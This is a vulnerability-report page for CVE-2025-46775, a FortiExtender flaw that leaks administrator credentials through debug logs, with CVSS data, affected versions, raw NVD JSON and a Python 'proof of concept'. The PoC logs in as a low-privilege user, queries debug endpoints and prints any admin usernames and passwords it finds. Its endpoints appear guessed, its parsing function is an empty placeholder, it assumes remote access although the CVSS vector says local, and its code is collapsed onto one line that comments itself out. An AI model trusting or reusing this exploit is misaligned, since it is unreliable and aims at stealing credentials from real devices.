Security Vulnerability Report
中文
CVE-2025-46775 CVSS 5.5 MEDIUM

CVE-2025-46775

Published: 2025-11-18 17:16:02
Last Modified: 2025-11-20 14:40:25
Source: [email protected]

Description

A debug messages revealing unnecessary information vulnerability in Fortinet FortiExtender 7.6.0 through 7.6.1, FortiExtender 7.4.0 through 7.4.6, FortiExtender 7.2 all versions, FortiExtender 7.0 all versions may allow an authenticated user to obtain administrator credentials via debug log commands.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:fortinet:fortiextender_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:fortinet:fortiextender_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:fortinet:fortiextender:-:*:*:*:*:*:*:* - NOT VULNERABLE
FortiExtender 7.6.0 - 7.6.1
FortiExtender 7.4.0 - 7.4.6
FortiExtender 7.2 所有版本
FortiExtender 7.0 所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-46775 PoC - FortiExtender Debug Log Information Disclosure # This PoC demonstrates how an authenticated low-privilege user can obtain admin credentials import requests import json import sys # Configuration TARGET_IP = "192.168.1.99" # Target FortiExtender IP USERNAME = "low_privilege_user" # Low privilege user account PASSWORD = "user_password" def exploit_cve_2025_46775(): """ Exploit CVE-2025-46775: Information disclosure via debug log commands """ print(f"[*] Targeting FortiExtender: {TARGET_IP}") print(f"[*] Authenticating as: {USERNAME}") # Step 1: Authentication auth_url = f"https://{TARGET_IP}/api/v2/login" auth_data = { "username": USERNAME, "password": PASSWORD } session = requests.Session() try: response = session.post(auth_url, json=auth_data, verify=False, timeout=10) if response.status_code != 200: print("[-] Authentication failed") return False print("[+] Authentication successful") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False # Step 2: Execute debug log command to trigger information disclosure print("[*] Executing debug log command...") debug_url = f"https://{TARGET_IP}/api/v2/cmdb/system/debug" debug_params = { "action": "log", "level": "debug" } try: response = session.get(debug_url, params=debug_params, verify=False, timeout=10) if response.status_code == 200: print("[+] Debug log retrieved") # Check for admin credentials in response if "admin" in response.text.lower() or "password" in response.text.lower(): print("[!] Admin credentials potentially exposed!") print("[*] Extracting sensitive information...") # Parse and display exposed credentials exposed_data = parse_exposed_credentials(response.text) if exposed_data: print("[+] Exposed credentials found:") for cred in exposed_data: print(f" - Username: {cred.get('username')}") print(f" - Password: {cred.get('password')}") return True else: print("[-] No credentials found in debug log") return False else: print(f"[-] Debug command failed: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return False def parse_exposed_credentials(data): """ Parse exposed credentials from debug log output """ # This is a placeholder - actual implementation depends on response format exposed = [] # Parse logic would extract username/password from debug output return exposed if __name__ == "__main__": print("CVE-2025-46775 PoC - FortiExtender Debug Log Information Disclosure") print("=" * 70) success = exploit_cve_2025_46775() if success: print("\n[+] Exploitation successful - Admin credentials obtained") else: print("\n[-] Exploitation failed") sys.exit(0 if success else 1)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46775", "sourceIdentifier": "[email protected]", "published": "2025-11-18T17:16:01.973", "lastModified": "2025-11-20T14:40:25.397", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A debug messages revealing unnecessary information vulnerability in Fortinet FortiExtender 7.6.0 through 7.6.1, FortiExtender 7.4.0 through 7.4.6, FortiExtender 7.2 all versions, FortiExtender 7.0 all versions may allow an authenticated user to obtain administrator credentials via debug log commands."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1295"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortiextender_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.4.8", "matchCriteriaId": "D99BE066-31DA-417E-9C7F-73453CE4A69D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortiextender_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.3", "matchCriteriaId": "3F3DA4B8-95C4-407B-B632-D8F48C89511E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:fortinet:fortiextender:-:*:*:*:*:*:*:*", "matchCriteriaId": "A0617C1D-E321-409D-B54B-775E854A03C1"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-259", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.